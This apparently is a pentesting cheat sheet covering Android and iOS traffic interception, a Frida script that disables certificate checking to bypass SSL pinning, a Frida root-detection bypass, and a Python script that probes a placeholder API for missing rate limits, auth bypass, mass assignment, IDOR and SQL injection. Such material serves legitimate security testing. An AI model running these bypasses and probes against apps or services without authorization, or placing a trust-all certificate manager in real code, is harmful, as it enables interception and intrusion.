Mobile & API Pentesting
🔥 Vibe Prompt
"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."
Mobile Setup
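# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install the Burp CA as a *system* CA. Android reads /system/etc/security/cacerts
#    as PEM files named <subject_hash_old>.0, so the DER export must be converted first
#    (pushing the raw .der under that name leaves a file the trust store cannot parse).
#    9a5ba575 is the hash this page uses for Burp's CA; confirm it with
#    `openssl x509 -inform PEM -subject_hash_old -in 9a5ba575.0 -noout`.
openssl x509 -inform DER -in burp-ca.der -out 9a5ba575.0
adb push 9a5ba575.0 /sdcard/
# /system is read-only; remount before copying. On recent Android builds the remount may
# be refused even as root, in which case a Magisk module that overlays cacerts is the
# usual alternative. 644 matches the permissions of the shipped CA files.
adb shell "su -c 'mount -o remount,rw /system && cp /sdcard/9a5ba575.0 /system/etc/security/cacerts/9a5ba575.0 && chmod 644 /system/etc/security/cacerts/9a5ba575.0'"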
# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings → Profile)
# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js
Frida SSL Bypass
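// ssl_bypass.js
// Swaps the trust managers handed to SSLContext.init for one that accepts any
// certificate chain, so the proxy's CA is accepted even when the app pins.
// Scope: only code paths that build an SSLContext via init() are affected;
// pinning implemented elsewhere is not touched by this hook.
Java.perform(function() {
  // javax.net.ssl.TrustManager is a marker interface with no methods, so a class
  // that implements only it is never consulted for certificate checks; the TLS
  // stack looks for X509TrustManager, which declares the three methods below.
  var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
  var SSLContext = Java.use('javax.net.ssl.SSLContext');

  var TrustAll = Java.registerClass({
    name: 'com.example.TrustAll',
    implements: [X509TrustManager],
    methods: {
      // Accept every chain; no exception means "trusted".
      checkClientTrusted: function(chain, authType) {},
      checkServerTrusted: function(chain, authType) {},
      getAcceptedIssuers: function() { return []; }
    }
  });

  SSLContext.init.overload(
    '[Ljavax.net.ssl.KeyManager;',
    '[Ljavax.net.ssl.TrustManager;',
    'java.security.SecureRandom'
  ).implementation = function(keyManagers, trustManagers, secureRandom) {
    // Keep the app's own key managers (client certificates still work) and
    // replace only the trust side. Calling init on the wrapper here invokes
    // the original method.
    return this.init(keyManagers, [TrustAll.$new()], secureRandom);
  };

  console.log("SSL pinning bypassed!");
});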
# Run: frida -U -f com.target.app -l ssl_bypass.js
Root Detection Bypass
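// root_bypass.js
// Two independent hooks: one for the RootBeer library's aggregate check, one
// for file-existence probes of common root binaries.
Java.perform(function() {
  // Method 1: hook RootBeer's isRooted().
  // Java.use throws when the app does not bundle RootBeer; unguarded, that
  // exception aborts the whole callback and Method 2 is never installed.
  try {
    var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
    RootBeer.isRooted.implementation = function() { return false; };
  } catch (e) {
    console.log("RootBeer not found, skipping isRooted hook: " + e.message);
  }

  // Method 2: report "does not exist" for File.exists() probes whose path
  // mentions su or magisk.
  var File = Java.use('java.io.File');
  File.exists.implementation = function() {
    var path = this.getPath();
    // Plain substring match, so any path containing "su" (e.g. ".../resume.pdf")
    // is also reported missing, which can break unrelated app features. Tighten
    // to a basename comparison if the app misbehaves under this hook.
    if (path.includes("su") || path.includes("magisk")) {
      return false;
    }
    // Calling exists() on the wrapper from inside the hook runs the original.
    return this.exists();
  };

  console.log("Root detection bypassed!");
});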
API Security Testing
import requests
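BASE = "https://api.target.com/v1"
# Bearer token of a low-privilege test account, used by the IDOR check.
# The original script read an undefined `token`; this is a placeholder value.
TOKEN = "<TEST_ACCOUNT_BEARER_TOKEN>"
# Per-request timeout in seconds; without it a slow or black-holed endpoint
# hangs the whole run.
TIMEOUT = 10


def _json_body(r):
    """Return the decoded JSON body of `r`, or None when it is not valid JSON."""
    try:
        return r.json()
    except ValueError:
        return None


def _check_rate_limit(findings):
    """Burst failed logins and record a finding only if no 429 ever appears."""
    # The original reported "no rate limiting" as soon as the 12th request was
    # not a 429, which misses limits that kick in later in the burst.
    # A burst of failures may lock the account named in the body; prefer a
    # throwaway test account over a real "admin" user.
    for _ in range(100):
        r = requests.post(
            f"{BASE}/login",
            json={"user": "admin", "pass": "wrong"},
            timeout=TIMEOUT,
        )
        if r.status_code == 429:
            return  # throttled as expected
    findings.append("No rate limiting on login!")


def _check_auth_bypass(findings):
    """An admin endpoint must not answer 200 to a bogus bearer token."""
    r = requests.get(
        f"{BASE}/admin/users",
        headers={"Authorization": "Bearer invalid"},
        timeout=TIMEOUT,
    )
    if r.status_code == 200:
        findings.append("Auth bypass!")


def _check_mass_assignment(findings):
    """A profile update must not accept a client-supplied role field."""
    r = requests.put(
        f"{BASE}/user/profile",
        json={"name": "test", "role": "admin"},
        timeout=TIMEOUT,
    )
    # NOTE(review): a 200 only shows the request was not rejected; confirm the
    # role actually changed by reading the profile back before reporting.
    if r.status_code == 200:
        findings.append("Mass assignment: role updated!")


def _check_idor(findings, token):
    """Two order ids fetched with one token must not belong to different users."""
    auth = {"Authorization": f"Bearer {token}"}
    r1 = requests.get(f"{BASE}/orders/1", headers=auth, timeout=TIMEOUT)
    r2 = requests.get(f"{BASE}/orders/2", headers=auth, timeout=TIMEOUT)
    # Both responses must be 200 and JSON objects before user_id is compared;
    # the original called .json() on r1 unconditionally and crashed on a 4xx.
    if r1.status_code != 200 or r2.status_code != 200:
        return
    b1 = _json_body(r1)
    b2 = _json_body(r2)
    if not isinstance(b1, dict) or not isinstance(b2, dict):
        return
    if b1.get("user_id") != b2.get("user_id"):
        findings.append("IDOR: can access other orders!")


def _check_injection(findings):
    """A boolean SQL payload in the search query must not yield results."""
    # params= URL-encodes the payload; the original f-string left the quote and
    # spaces raw in the request line.
    r = requests.get(f"{BASE}/search", params={"q": "' OR 1=1--"}, timeout=TIMEOUT)
    body = _json_body(r)
    # Heuristic only: a non-empty result set is not proof of injection. Compare
    # against the result count for a benign query before treating this as real.
    if r.status_code == 200 and isinstance(body, (list, dict)) and len(body) > 0:
        findings.append("SQL injection in search!")


def test_api(token=TOKEN):
    """Run the five API checks against BASE and return a list of finding strings.

    `token` is the bearer token used for the IDOR check; the zero-argument call
    keeps working through the TOKEN default. An empty list means nothing was
    flagged. Network errors (requests.RequestException) propagate to the caller.
    """
    findings = []
    _check_rate_limit(findings)       # 1. Rate limiting
    _check_auth_bypass(findings)      # 2. Auth bypass
    _check_mass_assignment(findings)  # 3. Mass assignment
    _check_idor(findings, token)      # 4. IDOR
    _check_injection(findings)        # 5. Injection
    return findings


for f in test_api():
    print(f"⚠️ {f}")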
Mobile Pentesting Checklist
| Check | Android | iOS |
|-------|---------|-----|
| Traffic interception | Burp proxy + CA cert | QProxy + CA cert |
| SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 |
| Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack |
| Insecure storage | SharedPrefs, SQLite | Keychain, Plist |
| Hardcoded secrets | APK decompile | IPA decompile |
| App clipping | Intent sniffing | URL scheme hijack |
| Emulator detection | Build fingerprint | Model check |
Tools
| Tool | Purpose |
|------|---------|
| Frida | Runtime manipulation |
| Objection | Mobile exploration |
| APKTool | APK decompile |
| MobSF | Static/dynamic analysis |
| Drozer | Android security audit |
| Radare2 | Binary analysis |
| Hopper | iOS disassembler |
Best Practices
- Always test on a real device (emulator detection is common)
- Use Frida for runtime bypasses
- Decompile APK/IPA for hardcoded secrets
- Test both API and mobile app together
- Check for insecure data storage
- Verify rate limiting on all endpoints
- Test app clipping / intent hijacking